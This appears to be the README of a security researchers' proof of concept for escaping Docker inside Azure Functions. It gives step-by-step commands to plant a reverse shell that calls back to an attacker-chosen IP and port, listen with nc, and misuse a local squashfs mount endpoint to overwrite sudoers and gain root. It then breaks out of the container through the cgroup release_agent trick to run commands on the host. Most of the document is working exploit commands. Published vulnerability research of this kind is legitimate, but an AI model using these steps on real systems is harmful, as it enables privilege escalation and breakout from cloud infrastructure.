For more details: https://www.intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/
In this POC we'll setup a reverse shell with the squashfs to escalate privileges in Azure Function, and break out of the Docker environment.
-
Install Azure Functions CLI
-
Follow the Azure guide for setting up an Azure Function
-
Copy the files required for the POC to the function directory:
cp files/__init__.py FUNCTIONDIR/FUNCTIONNAME/__init__.py cp files/sudoers.sqsh FUNCTIONDIR/
-
Fill in the
PORTandIPfields in theFUNCTIONDIR/FUNCTIONNAME/__init__.pyfile to the server that will communicate with the reverse shell. -
Deploy the function (like in the guide above):
func azure functionapp publish <APP_NAME> -
Listen on the reverse shell port (don't forget to white list this port on the firewall):
nc -nlv 0.0.0.0 PORTand invoke the Function with the invocation URL you were given with the
functionapp publishcommand. -
You should now be in the Azure Function, escalate privileges:
curl "localhost:6060/?operation=squashfs&filePath=/home/site/wwwroot/sudoers.sqsh&targetPath=/etc/sudoers.d" sudo su -
Finally, break out of the Docker container (run ps on the Docker host in our example):
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x touch /output echo 1 > /tmp/cgrp/x/notify_on_release mount > /tmp/mtab host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /tmp/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent echo '#!/bin/sh' > /cmd echo "ps aux >> $host_path/hostps" >> /cmd echo "ps aux >> $host_path/hostps2" >> /cmd chmod a+x /cmd sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"